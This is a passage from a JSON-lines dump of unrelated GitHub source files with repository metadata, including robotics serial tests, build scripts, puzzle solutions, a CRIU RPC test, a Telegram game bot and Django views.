print(\"\")\r\n time.sleep(0.5)\r\n\r\n###################### USART READ (DEVICE 2 ... 
n) ##########################\r\n\r\ndef usart_read(slave_id):\r\n rxbuf = []\r\n global txrx_result\r\n \r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n rxbuf, dxl_comm_result, dxl_error = packetHandler.readTxRx(portHandler, slave_id, ADDR_BUF_A, len(txbuf))\r\n\r\n print(\"RX buffer of DEVICE\", (slave_id - DXL_ID), \"with ID\", slave_id, \":\", rxbuf)\r\n print(\"\")\r\n\r\n if rxbuf == txbuf:\r\n txrx_result = SUCCESS\r\n print(\"Successful transmit\")\r\n else:\r\n txrx_result = 0\r\n print(\"Unsuccessful transmit\")\r\n print(\"Trying again...\")\r\n \r\n print(\"\")\r\n time.sleep(0.2)\r\n\r\ndef usart_ring_txrx():\r\n dev_id = DXL_ID\r\n global txrx_result\r\n\r\n while dev_id < DXL_ID+DEVICE_NUMBER:\r\n dev_id += 1\r\n\r\n master_id = dev_id\r\n if(master_id == DXL_ID+DEVICE_NUMBER):\r\n slave_id = DXL_ID+1\r\n else:\r\n slave_id = master_id+1\r\n\r\n print(\"\")\r\n print(\"ROUND\", (dev_id-DXL_ID))\r\n print(\"Master ID:\", master_id)\r\n print(\"Slave ID:\", slave_id)\r\n\r\n usart_set(master_id, slave_id)\r\n while txrx_result != SUCCESS:\r\n usart_send(master_id, slave_id)\r\n usart_read(slave_id)\r\n time.sleep(1)\r\n txrx_result = 0\r\n\r\ntry:\r\n port_open()\r\n show_info()\r\n id_set()\r\n usart_ring_txrx()\r\n set_def_id()\r\n# usart_set(self, )\r\nexcept KeyboardInterrupt:\r\n time.sleep(0.5)\r\n\r\nportHandler.closePort()\r\nquit()","repo_name":"AppliedRobotics/sensors_dxl_updater","sub_path":"xface_test/usart_test_circle.py","file_name":"usart_test_circle.py","file_ext":"py","file_size_in_byte":9622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4186371021","text":"import os\nimport subprocess\n\nSRC_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nCMAKE_DIR = os.path.join(SRC_DIR, 'third_party', 'cmake')\nCMAKE_EXECUTABLE = os.path.join(CMAKE_DIR, 'bin', 'cmake.exe')\nOUT_DIR = os.path.join(SRC_DIR, 'out')\n\n\ndef generate_build_bat(dest_dir, msvs_bat_file_command, copy_command):\n lines = []\n # Save current dir and cd to build dir\n lines.append('pushd %~dp0')\n # Use local environment\n lines.append('setlocal')\n # Set up environment\n lines.append('call \"{}\" {}'.format(\n msvs_bat_file_command[0], ' '.join(msvs_bat_file_command[1:])))\n # Call ninja, passing it whatever user passed to .bat file.\n lines.append('ninja %*')\n # Restore environment\n lines.append('endlocal')\n if copy_command:\n lines.append(copy_command)\n # Restore directory\n lines.append('popd')\n dest_path = os.path.join(dest_dir, 'build.bat')\n with open(dest_path, 'w') as f:\n f.write('\\n'.join(lines))\n\n\ndef get_dir_name(build_type, platform_type):\n return build_type + '_' + platform_type\n\n\ndef gen_for_build_type(build_type, platform_type, msvs_bat_file_command):\n dest_dir = os.path.join(OUT_DIR, get_dir_name(build_type, platform_type))\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n if platform_type == 'x86':\n copy_command = 'copy bin\\\\*32* ..\\\\{}\\\\bin\\\\'.format(\n get_dir_name(build_type, 'amd64'))\n else:\n copy_command = None\n generate_build_bat(dest_dir, msvs_bat_file_command, copy_command)\n os.chdir(dest_dir)\n args = [\n CMAKE_EXECUTABLE,\n '-G', 'Ninja',\n '-DCMAKE_BUILD_TYPE=' + build_type,\n SRC_DIR\n ]\n subprocess.check_call(args)\n\n\ndef grab_environ(msvs_bat_file_command):\n args = list(msvs_bat_file_command)\n args.extend(['&', 'set'])\n output = subprocess.check_output(args)\n for line in output.split('\\r'):\n line = line.strip()\n 
if not line:\n continue\n var_name, var_value = line.split('=', 1)\n os.environ[var_name] = var_value\n\n\ndef gen_for_platform(vs_dir, platform_type):\n bat_path = os.path.join(vs_dir, 'VC', 'vcvarsall.bat')\n msvs_bat_file_command = [bat_path, platform_type]\n grab_environ(msvs_bat_file_command)\n gen_for_build_type('Debug', platform_type, msvs_bat_file_command)\n gen_for_build_type('RelWithDebInfo', platform_type, msvs_bat_file_command)\n\n\ndef main():\n vs_dir = os.path.dirname(os.path.dirname(os.path.dirname(\n os.environ['VS140COMNTOOLS'])))\n gen_for_platform(vs_dir, 'x86')\n gen_for_platform(vs_dir, 'amd64')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vchigrin/stakhanov","sub_path":"src/build/run_cmake.py","file_name":"run_cmake.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"27402141568","text":"Max = 0\r\nanswer = 0\r\nfor i in range(1, 1000000, 1):\r\n print(str(i))\r\n p = i\r\n n = i\r\n length = 0\r\n while n > 1:\r\n if n%2 == 0:\r\n n = n/2\r\n else:\r\n n = 3*n+1\r\n length += 1\r\n if length > Max:\r\n Max = length\r\n answer = p\r\n\r\nprint(\"Answer: \" + str(answer))\r\n","repo_name":"dreary-dugong/puzzles","sub_path":"ProjectEuler/problem14.py","file_name":"problem14.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43543976078","text":"import ctypes\n\nclass MyList:\n\n def __init__(self):\n self.capacity=1\n self.n=0\n self.A= self.__make_array(self.capacity)\n\n def __len__(self):\n return self.n\n \n def append(self,item):\n if self.capacity==self.n:\n #we have to resize the array\n self.__resize(2*self.capacity)\n self.A[self.n]=item\n self.n+=1 \n\n def __getitem__(self,index):\n if 0<=index/edit', methods=[\"GET\", \"POST\"])\n@acl.allows.requires(acl.is_admin)\ndef edit(door_id):\n door = models.Door.objects.get(id=door_id)\n\n form = DoorForm(obj=door)\n if not form.validate_on_submit():\n return render_template('/administration/doors/create-edit.html',\n form=form)\n\n form.populate_obj(door)\n door.save()\n\n return redirect(url_for('administration.doors.index'))\n\n\n@module.route('//delete')\n@acl.allows.requires(acl.is_admin)\ndef delete(door_id):\n door = models.Door.objects.get(id=door_id)\n door.status = 'delete'\n door.save()\n\n return redirect(url_for('administration.doors.index'))\n","repo_name":"r202-coe-psu/pichayon","sub_path":"pichayon/web/views/administration/doors.py","file_name":"doors.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72197364405","text":"with open(\"d09.txt\", \"r\") as f:\n nums = [\n int(line.strip())\n for line in f.readlines()\n if line.strip()\n ]\n\n\ndef calc1(plen, nums):\n cur = plen\n preamble = nums[:cur]\n psets = [\n {n+m for j, m in enumerate(preamble) if n != m}\n for i, n in enumerate(preamble)\n ]\n\n while cur < len(nums):\n v = nums[cur]\n if not any(map(lambda s: v in s, psets)):\n return v\n\n preamble = preamble[1:]\n preamble.append(v)\n\n psets = psets[1:]\n psets.append({v+n for n in preamble if v != n})\n\n cur += 1\n\n return None\n\n\nv = calc1(25, nums)\nprint(v)\n\n\ndef calc2(v, nums):\n b, e = 0, 1\n tot = sum(nums[b:e+1])\n while tot != v:\n if tot > v:\n b += 1\n else:\n e += 1\n tot = sum(nums[b:e+1])\n return min(nums[b:e+1]) + 
max(nums[b:e+1])\n\n\nprint(calc2(v, nums))\n","repo_name":"encetamasb/aoc2020","sub_path":"d09.py","file_name":"d09.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1772319288","text":"import os\nimport shutil\nfrom alphago.training.reinforcement_policy_trainer import run_training\nfrom config import slpolicy_model, slpolicy_weight, rlpolicy_weight\nfrom util import ask_yn\n\n\ndef learn_weights(weight_SL):\n run_training(cmd_line_args=[\n slpolicy_model,\n weight_SL,\n rlpolicy_weight,\n \"--save-every\", \"500\",\n \"--game-batch\", \"128\",\n \"--iterations\", \"10000\",\n \"--record-every\", \"50\",\n \"--move-limit\", \"400\",\n \"--verbose\",\n ])\n\n\ndef resume_learning(weight_RL):\n run_training(cmd_line_args=[\n slpolicy_model,\n weight_RL,\n rlpolicy_weight,\n # \"--save-every\", \"500\",\n # \"--game-batch\", \"20\",\n # \"--iterations\", \"10000\",\n \"--save-every\", \"100\",\n \"--game-batch\", \"1\",\n \"--iterations\", \"2\",\n \"--resume\",\n \"--verbose\",\n ])\n\n\nif __name__ == '__main__':\n flag = True\n if os.path.isdir(rlpolicy_weight):\n print(\"rlpolicy_weight is exists. Can I execute learn_weights?\")\n flag = ask_yn()\n\n weight_SL = os.path.join(slpolicy_weight, \"weights.00001.hdf5\")\n if flag: learn_weights(weight_SL)\n","repo_name":"syarig/Cygo","sub_path":"train_rl_policy_net.py","file_name":"train_rl_policy_net.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"40113429907","text":"\"\"\"\nDefines classes to represent a collection of views.\n\nFactsheet uses outlines containing topics and facts. ViewStack provides\na collection to contain and display views of items in an\noutline. ViewStack presents one view at a time.\n\"\"\"\nimport gi # type: ignore[import]\nimport logging\nimport typing\n\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk # type: ignore[import] # noqa: E402\n\nlogger = logging.getLogger('Main.VSTACK')\n\nNameView = str\nUiViewStack = typing.Union[Gtk.Stack]\nViewItem = typing.Union[Gtk.Widget]\n\n\nclass ViewStack:\n \"\"\"Displays view at a time from a collection of views.\n\n Each view is a presentation element for an item (such as a topic,\n fact, or fact value). Each item view is identified by a name.\n Methods use view name to add, show, pin, or remove the item view.\n The class supports pinning names. When a name is pinned, the\n corresponding view cannot be removed.\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initilize collection of item views.\"\"\"\n self._ui_view = Gtk.Stack()\n self._pinned: typing.MutableSequence[NameView] = list()\n\n def add_view(self, p_view: ViewItem, p_name: NameView) -> None:\n \"\"\"Add an item view with the given name to the collection.\n\n When the collection contains a view with the given name, log a\n warning and do not change the collection.\n\n :param p_view: item view to add.\n :param p_name: name of view. 
A name may appear at most once in\n the collection.\n \"\"\"\n child = self._ui_view.get_child_by_name(p_name)\n if child is not None:\n logger.warning(\n 'Duplicate view \\'{}\\' for name {} ({}.{})'\n ''.format(p_view, p_name, type(self).__name__,\n self.add_view.__name__))\n return\n\n self._ui_view.add_named(p_view, p_name)\n p_view.show()\n\n def clear(self) -> None:\n \"\"\"Remove all unpinned item views from collection.\"\"\"\n for view in self._ui_view:\n name = self._ui_view.child_get_property(view, 'name')\n self.remove_view(name)\n\n def __contains__(self, p_name: typing.Any) -> bool:\n \"\"\"Return True when collection contains item view with given name.\"\"\"\n if not isinstance(p_name, str):\n return False\n\n child = self._ui_view.get_child_by_name(p_name)\n if child is None:\n return False\n\n return True\n\n def get_name_visible(self) -> typing.Optional[NameView]:\n \"\"\"Return name of visible item view or None when no view is visible.\"\"\"\n return self._ui_view.get_visible_child_name()\n\n def pin_view(self, p_name: NameView) -> None:\n \"\"\"Pin an item view name so that the view cannot be removed.\n\n When the name does correspond to an item view in the collection\n or when the named view is pinned, log a warning.\n\n :param p_name: name of the item view to pin.\n \"\"\"\n view = self._ui_view.get_child_by_name(p_name)\n if view is None:\n logger.warning('No view named \\'{}\\' ({}.{})'\n ''.format(p_name, type(self).__name__,\n self.pin_view.__name__))\n return\n\n if p_name in self._pinned:\n logger.warning('View named \\'{}\\' already pinned ({}.{})'\n ''.format(p_name, type(self).__name__,\n self.pin_view.__name__))\n return\n\n self._pinned.append(p_name)\n\n def remove_view(self, p_name: NameView) -> None:\n \"\"\"Remove an item view from the collection.\n\n Log a warning when the name does correspond to an item view in\n the collection or when the named view is pinned..\n\n :param p_name: name of the item view to remove.\n \"\"\"\n if p_name in self._pinned:\n logger.warning('Pinned item view named \\'{}\\' cannot be removed '\n '({}.{})'.format(p_name, type(self).__name__,\n self.remove_view.__name__))\n return\n\n view_item = self._ui_view.get_child_by_name(p_name)\n if view_item is None:\n logger.warning('No item view named \\'{}\\' ({}.{})'\n ''.format(p_name, type(self).__name__,\n self.remove_view.__name__))\n return\n\n self._ui_view.remove(view_item)\n\n def show_view(self, p_name: NameView) -> typing.Optional[NameView]:\n \"\"\"Attempt to show an item view and return name of visible view.\n\n Log a warning when no item view has given name.\n\n :param p_name: name of item view to show.\n \"\"\"\n item = self._ui_view.get_child_by_name(p_name)\n if item is not None:\n self._ui_view.set_visible_child(item)\n else:\n logger.warning('No item view named \\'{}\\' ({}.{})'\n ''.format(p_name, type(self).__name__,\n self.show_view.__name__))\n name_visible = self._ui_view.get_visible_child_name()\n return name_visible\n\n @property\n def ui_view(self) -> UiViewStack:\n \"\"\"Return user interface element of stack.\"\"\"\n return self._ui_view\n\n def unpin_view(self, p_name: NameView) -> None:\n \"\"\"Unpin an item view so that it can be removed.\n\n Log a warning when the named view is not pinned..\n\n :param p_name: name of the item view to unpin.\n \"\"\"\n try:\n self._pinned.remove(p_name)\n except ValueError:\n logger.warning('View named \\'{}\\' not pinned ({}.{})'\n ''.format(p_name, type(self).__name__,\n 
self.unpin_view.__name__))\n","repo_name":"gary9204/StuckFactsheet","sub_path":"src/factsheet/view/view_stack.py","file_name":"view_stack.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24989133563","text":"#!/usr/bin/python3\n\nimport argparse\nimport os\nimport sys\nimport time\nfrom tempfile import mkstemp\n\nimport rpc_pb2 as rpc\n\nfrom setup_swrk import setup_swrk\n\nlog_file = 'config_file_test.log'\ndoes_not_exist = 'does-not.exist'\n\n\ndef setup_config_file(content):\n # Creating a temporary file which will be used as configuration file.\n fd, path = mkstemp()\n\n with os.fdopen(fd, 'w') as f:\n f.write(content)\n\n os.environ['CRIU_CONFIG_FILE'] = path\n\n return path\n\n\ndef cleanup_config_file(path):\n if os.environ.get('CRIU_CONFIG_FILE', None) is not None:\n del os.environ['CRIU_CONFIG_FILE']\n os.unlink(path)\n\n\ndef cleanup_output(path):\n for f in (does_not_exist, log_file):\n f = os.path.join(path, f)\n if os.access(f, os.F_OK):\n os.unlink(f)\n\n\ndef setup_criu_dump_request():\n # Create criu msg, set it's type to dump request\n # and set dump options. Checkout more options in protobuf/rpc.proto\n req = rpc.criu_req()\n req.type = rpc.DUMP\n req.opts.leave_running = True\n req.opts.log_level = 4\n req.opts.log_file = log_file\n req.opts.images_dir_fd = os.open(args['dir'], os.O_DIRECTORY)\n # Not necessary, just for testing\n req.opts.tcp_established = True\n req.opts.shell_job = True\n return req\n\n\ndef do_rpc(s, req):\n # Send request\n s.send(req.SerializeToString())\n\n # Recv response\n resp = rpc.criu_resp()\n MAX_MSG_SIZE = 1024\n resp.ParseFromString(s.recv(MAX_MSG_SIZE))\n\n s.close()\n return resp\n\n\ndef test_broken_configuration_file():\n # Testing RPC configuration file mode with a broken configuration file.\n # This should fail\n content = 'hopefully-this-option-will-never=exist'\n path = setup_config_file(content)\n swrk, s = setup_swrk()\n s.close()\n # This test is only about detecting wrong configuration files.\n # If we do not sleep it might happen that we kill CRIU before\n # it parses the configuration file. A short sleep makes sure\n # that the configuration file has been parsed. 
Hopefully.\n # (I am sure this will fail horribly at some point)\n time.sleep(0.3)\n swrk.kill()\n return_code = swrk.wait()\n # delete temporary file again\n cleanup_config_file(path)\n if return_code != 1:\n print('FAIL: CRIU should have returned 1 instead of %d' % return_code)\n sys.exit(-1)\n\n\ndef search_in_log_file(log, message):\n with open(os.path.join(args['dir'], log)) as f:\n if message not in f.read():\n print(\n 'FAIL: Missing the expected error message (%s) in the log file'\n % message)\n sys.exit(-1)\n\n\ndef check_results(resp, log):\n # Check if the specified log file exists\n if not os.path.isfile(os.path.join(args['dir'], log)):\n print('FAIL: Expected log file %s does not exist' % log)\n sys.exit(-1)\n # Dump should have failed with: 'The criu itself is within dumped tree'\n if resp.type != rpc.DUMP:\n print('FAIL: Unexpected msg type %r' % resp.type)\n sys.exit(-1)\n if 'The criu itself is within dumped tree' not in resp.cr_errmsg:\n print('FAIL: Missing the expected error message in RPC response')\n sys.exit(-1)\n # Look into the log file for the same message\n search_in_log_file(log, 'The criu itself is within dumped tree')\n\n\ndef test_rpc_without_configuration_file():\n # Testing without configuration file\n # Just doing a dump and checking for the logfile\n req = setup_criu_dump_request()\n _, s = setup_swrk()\n resp = do_rpc(s, req)\n s.close()\n check_results(resp, log_file)\n\n\ndef test_rpc_with_configuration_file():\n # Testing with configuration file\n # Just doing a dump and checking for the logfile\n\n # Setting a different log file via configuration file\n # This should not work as RPC settings overwrite configuration\n # file settings in the default configuration.\n log = does_not_exist\n content = 'log-file ' + log + '\\n'\n content += 'no-tcp-established\\nno-shell-job'\n path = setup_config_file(content)\n req = setup_criu_dump_request()\n _, s = setup_swrk()\n do_rpc(s, req)\n s.close()\n cleanup_config_file(path)\n # Check if the specified log file exists\n # It should not as configuration files do not overwrite RPC values.\n if os.path.isfile(os.path.join(args['dir'], log)):\n print('FAIL: log file %s should not exist' % log)\n sys.exit(-1)\n\n\ndef test_rpc_with_configuration_file_overwriting_rpc():\n # Testing with configuration file\n # Just doing a dump and checking for the logfile\n\n # Setting a different log file via configuration file\n # This should not work as RPC settings overwrite configuration\n # file settings in the default configuration.\n log = does_not_exist\n content = 'log-file ' + log + '\\n'\n content += 'no-tcp-established\\nno-shell-job'\n path = setup_config_file(content)\n # Only set the configuration file via RPC;\n # not via environment variable\n del os.environ['CRIU_CONFIG_FILE']\n req = setup_criu_dump_request()\n req.opts.config_file = path\n _, s = setup_swrk()\n resp = do_rpc(s, req)\n s.close()\n cleanup_config_file(path)\n check_results(resp, log)\n\n\nparser = argparse.ArgumentParser(\n description=\"Test config files using CRIU RPC\")\nparser.add_argument('dir',\n type=str,\n help=\"Directory where CRIU images should be placed\")\n\nargs = 
vars(parser.parse_args())\n\ncleanup_output(args['dir'])\n\ntest_broken_configuration_file()\ncleanup_output(args['dir'])\ntest_rpc_without_configuration_file()\ncleanup_output(args['dir'])\ntest_rpc_with_configuration_file()\ncleanup_output(args['dir'])\ntest_rpc_with_configuration_file_overwriting_rpc()\ncleanup_output(args['dir'])\n","repo_name":"checkpoint-restore/criu","sub_path":"test/others/rpc/config_file.py","file_name":"config_file.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"en","doc_type":"code","stars":2427,"dataset":"github-code","pt":"76"} +{"seq_id":"42397487459","text":"mese = input(\"metti il nome del mese: \")\n\ngiorno = int(input(\"metti il numero del giorno: \"))\n\n\nif mese == \"gennaio\" or mese == \"Febbraio\":\n stagione = \"inverno\"\nelif mese == \"Marzo\":\n if giorno < 20:\n stagione = \"inverno\"\n else:\n stagione = \"primavera\"\nelif mese == \"Aprile\" or mese == \"Maggio\":\n stagione = \"primavera\"\nelif mese == \"giugno\":\n if giorno < 21:\n stagione = \"primavera\"\n else:\n stagione = \"estate\"\nelif mese == \"luglio\" or mese == \"agosto\":\n stagione = \"estate\"\nelif mese == \"Settembre\":\n if giorno < 22:\n stagione = \"estate\"\n else:\n stagione = \"autunno\"\nelif mese == \"ottobre\" or mese == \"novembre\":\n stagione = \"autunno\"\nelif mese == \"Dicembre\":\n if giorno < 21:\n stagione = \"autunno\"\n else:\n stagione = \"inverno\"\n \n \nprint(stagione)","repo_name":"GiuseppeGambac/Python","sub_path":"02_Condizioni/_47_stagioni.py","file_name":"_47_stagioni.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72122064887","text":"from telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, MessageHandler, Filters,ConversationHandler\nfrom logging_sw import *\nfrom random import randint\n\nfrom enum import Enum\n\ndef hello_command(update: Update, context: CallbackContext):\n log_sw(update, context)\n update.message.reply_text(f'Привет {update.effective_user.first_name} для начала нажмите /start\\n')\n\n\n\nglobal sweets\nsweets=100\nmax_sweets=28\n\nclass State(Enum):\n WAIT_COMMAND_USER1 = 1\n NONE = 3\n\nglobal state \nstate = State.NONE\n\n\ndef process_input_man(taken_sweets):\n global sweets\n global max_sweets\n if taken_sweets > max_sweets or taken_sweets> sweets:\n return False\n sweets -= taken_sweets\n return True\n \n\ndef bot_action():\n global sweets\n global max_sweets\n if sweets>max_sweets:\n bot_sweets = randint(1, max_sweets)\n sweets -= bot_sweets\n return bot_sweets\n else:\n bot_sweets = randint(1, sweets)\n sweets -= bot_sweets\n return bot_sweets\n\ndef input_handler(update: Update, context: CallbackContext):\n global sweets\n global max_sweets\n global state\n if state == State.WAIT_COMMAND_USER1:\n if not process_input_man(int(update.message.text)):\n update.message.reply_text(f'Ты не можешь взять такое количество конфет')\n return\n if sweets <= 0:\n update.message.reply_text(f'Увы, ты проиграл')\n state = State.NONE\n sweets=100\n else:\n play_bot(update=update, context=context)\n elif state == State.NONE:\n update.message.reply_text(f'Правила игры:\\n 1.У нас есть 100 конфет\\n 2. Максимально можно взять {max_sweets}\\n 3. 
Кто последний взял тот проиграл \\n и последнее кто первый начнет игру, если человек нажмите /m\\n если бот нажмите /b\\n')\n\n\ndef play_man(update: Update, context: CallbackContext):\n update.message.reply_text(f'Сейчас {sweets}\\n Сколько конфет возьмешь?')\n global state\n state = State.WAIT_COMMAND_USER1\n\ndef play_bot(update: Update, context: CallbackContext):\n global sweets\n global state\n bot_sweets = bot_action()\n if sweets <= 0:\n update.message.reply_text(f'Я взял {bot_sweets}, Я проиграл!')\n state =State.NONE\n sweets = 100\n else:\n update.message.reply_text(f'Хорошо, я взял {bot_sweets}') \n play_man(update, context)","repo_name":"Filippok82/working_version_bot","sub_path":"commands_sw.py","file_name":"commands_sw.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36880862360","text":"class LazyProperty:\n\tdef __init__(self, func):\n\t\tself.func = func\n\t\tself.name = func.__name__\n\tdef __get__(self, instance, owner):\n\t\tif not instance:\n\t\t\t# クラス変数としてアクセスされたときの処理\n\t\t\treturn self\n\t\t# self.funcは関数なので明示的にインスタンスを渡す\n\t\tv = self.func(instance)\n\t\tinstance.__dict__[self.name] = v\n\t\treturn v\n\nTAX_PATE = 1.10\nclass Book:\n\tdef __init__(self, raw_price):\n\t\tself.raw_price = raw_price\n\t@LazyProperty\n\tdef price(self):\n\t\tprint(\"calculate the price\")\n\t\treturn int(self.raw_price * TAX_PATE)\n\nbook = Book(1980)\nprint(book.price)\n\nprint(book.price)\n","repo_name":"souta-pqr/Program_Practice","sub_path":"python/jissen/9/des.py","file_name":"des.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29016230338","text":"#!/usr/bin/python\nimport sys\n\n#global variable\nisFirst = True\nthisTerm = \"\"\nlastTerm = \"\"\nthisID = -1\nlastID = -1\ndocIDs = []\n\n#reducer function for this treducer\nfor line in sys.stdin:\n\tterms = line.replace('\\n','').rsplit('\\t', 1)\n\tthisTerm = terms[0] #key\n\tthisID = terms[1] #value\n\tif isFirst:\n\t\tisFirst = False\n\t\tlastTerm = thisTerm\n\t\tlastID = thisID\n\tif lastID not in docIDs:\n\t\tdocIDs.append(lastID)\n\tif thisTerm != lastTerm:\n\t\tprint(lastTerm + '\\t' + str(docIDs))\n\t\tdocIDs.clear()\n\t\n\tlastTerm = thisTerm\n\tlastID = thisID\n\n#print the last key and value\nif lastID not in docIDs:\n\tdocIDs.append(lastID)\nprint(lastTerm + '\\t' + str(docIDs))\ndocIDs.clear()","repo_name":"frankGz/Bigdata_Analytics","sub_path":"hadoop_mapreduce/iireducer.py","file_name":"iireducer.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36383449008","text":"# https://www.acmicpc.net/problem/13305\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\nrail = list(map(int,input().split()))\r\ncost= list(map(int,input().split()))\r\n\r\nmin_cost = cost[0]\r\nanswer = 0\r\nfor i in range(n-1):\r\n if min_cost > cost[i]:\r\n min_cost = cost[i]\r\n answer += min_cost * rail[i]\r\n# 꼭 dp여도 dp list를 만들 필요는 없다\r\nprint(answer)","repo_name":"HyNS00/Beakjoon_hub","sub_path":"백준/Silver/13305. 
주유소/주유소.py","file_name":"주유소.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42125283528","text":"from django.shortcuts import render, render_to_response,redirect, get_object_or_404\nfrom django.contrib.auth import authenticate, login\nfrom django.http.response import HttpResponse,Http404\nfrom .models import User, Domain, Items, Relation\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.template.context_processors import csrf\nfrom django.utils import timezone\nfrom django.views import View,generic\nfrom .forms import UserRegistrationForm, DomainForm, ItemsForm, RelationForm, UploadFileForm\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth import logout as auth_logout\nfrom django.urls import reverse\nfrom django.template import loader, RequestContext\nfrom django.views.decorators.csrf import csrf_exempt, csrf_protect\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth.forms import UserChangeForm, PasswordChangeForm\n\n''' \n ItemsListView, RelationListView, DomainListView, DataListView \n classes to generate a list items views \n'''\nclass ItemsListView(View):\n model = Items\n def get(self,request):\n items_list = Items.objects.order_by('name').all()\n domain_list = Domain.objects.all()\n return render(request, 'dataprocessing/items_list.html', {'items_list': items_list, 'domain_list': domain_list})\n \n\nclass RelationListView(generic.ListView):\n model = Relation\n def get_queryset(self):\n return Relation.objects.all()\n\nclass DomainListView(generic.ListView):\n model = Domain\n def get_queryset(self):\n return Domain.objects.all()\n''' \n index to render the main page \n'''\n@login_required\ndef index(request):\n # Render the HTML template index.html with the data in the context variable\n domain_list = Domain.objects.filter(user=request.user)\n num_domain = Domain.objects.all().count()\n num_relation = Relation.objects.all().count()\n num_items = Items.objects.filter(author = request.user).count()\n return render(\n request,\n 'index.html',\n context={'num_domain':num_domain,'num_items':num_items,'num_relation':num_relation,'domain_list':domain_list}\n )\n\n''' \n Relation Block\n post and edit relation views \n'''\n@login_required\ndef edit_relation(request, pk):\n # Render the HTML template to edit relations\n relation = get_object_or_404(Relation, pk=pk)\n if request.method == \"POST\":\n form = RelationForm(request.POST, instance=relation)\n\n if form.is_valid():\n relation = form.save(commit=False)\n form.save()\n return redirect('/relation/')\n else:\n form = RelationForm(instance=relation)\n return render(request, 'dataprocessing/edit_relation.html', {'form': form})\n\ndef same_parent_relation(form):\n try:\n if form.cleaned_data['relation'] == '1':\n items_same_parent = list(form.cleaned_data['item2'])\n for item in items_same_parent:\n q = form.cleaned_data['item2'].exclude(name = item)\n item_id = Items.objects.get(name = item).id\n relation = Relation(item1 = Items.objects.get(pk = item_id), relation = '6')\n relation.save()\n relation.item2.set(q) \n except:\n pass\n\n@login_required\ndef post_relation(request):\n # Render the HTML template to post relations\n if request.method == \"POST\":\n form = RelationForm(request.POST)\n if form.is_valid():\n same_parent_relation(form)\n relation = form.save(commit=False)\n form.save()\n item = Items.objects.get(id = 
relation.item1.id)\n value = item.value\n item.value = int(value) + relation.item2.all().count()\n item.save()\n return redirect('/relation/')\n else:\n form = RelationForm()\n return render(request, 'dataprocessing/edit_relation.html', {'form': form})\n'''\n Domain Block\n post and edit domain views \n'''\n@login_required\n@permission_required('is_staff')\ndef post_domain(request):\n # Render the HTML template for superuser to create domain\n if request.method == \"POST\":\n form = DomainForm(request.POST)\n if form.is_valid():\n domain = form.save(commit=False)\n form.save()\n return redirect('/domain/')\n else:\n form = DomainForm()\n\n return render(request, 'dataprocessing/edit_domain.html', {'form': form})\n\n@login_required\n@permission_required('is_staff')\ndef edit_domain(request, pk):\n # Render the HTML template to edit domain\n domain = get_object_or_404(Domain, pk=pk)\n if request.method == \"POST\":\n form = DomainForm(request.POST, instance=domain)\n if form.is_valid():\n domain = form.save(commit=False)\n form.save()\n return redirect('/domain/')\n else:\n form = DomainForm(instance = domain)\n return render(request, 'dataprocessing/edit_domain.html', {'form': form})\n\n''' \n Items Block\n post and edit item views \n'''\n\n@login_required\ndef post_item(request):\n # Render the HTML template to post items\n if request.method == \"POST\":\n form = ItemsForm(request.POST)\n if form.is_valid():\n #Duplicate check\n if not Items.objects.filter(name = form.cleaned_data['name']).exists():\n items = form.save(commit=False)\n items.author = request.user\n form.save()\n\n return redirect('/items/')\n\n else:\n form = ItemsForm()\n return render(request, 'dataprocessing/edit_items.html', {'form': form})\n\n@login_required\ndef edit_item(request, pk):\n # Render the HTML template to edit items\n items = get_object_or_404(Items, pk=pk)\n if request.method == \"POST\":\n form = ItemsForm(request.POST, instance=items)\n if form.is_valid():\n items = form.save(commit=False)\n form.save()\n return redirect('/items/')\n else:\n form = ItemsForm(instance = items)\n return render(request, 'dataprocessing/edit_items.html', {'form': form})\n@login_required\ndef detail_item(request, pk):\n # Render the HTML template to edit items\n item = get_object_or_404(Items, pk=pk)\n relation = Relation.objects.filter(item1 = pk)\n print(relation)\n return render(request, 'dataprocessing/detail_items.html', {'item': item, 'relation':relation})\n\n@login_required\ndef item_delete(request, pk):\n items = Items.objects.get (pk = pk)\n items.delete()\n return redirect('/items/')\n\ndef register(request):\n # Render the HTML template to register\n if request.method == 'POST':\n user_form = 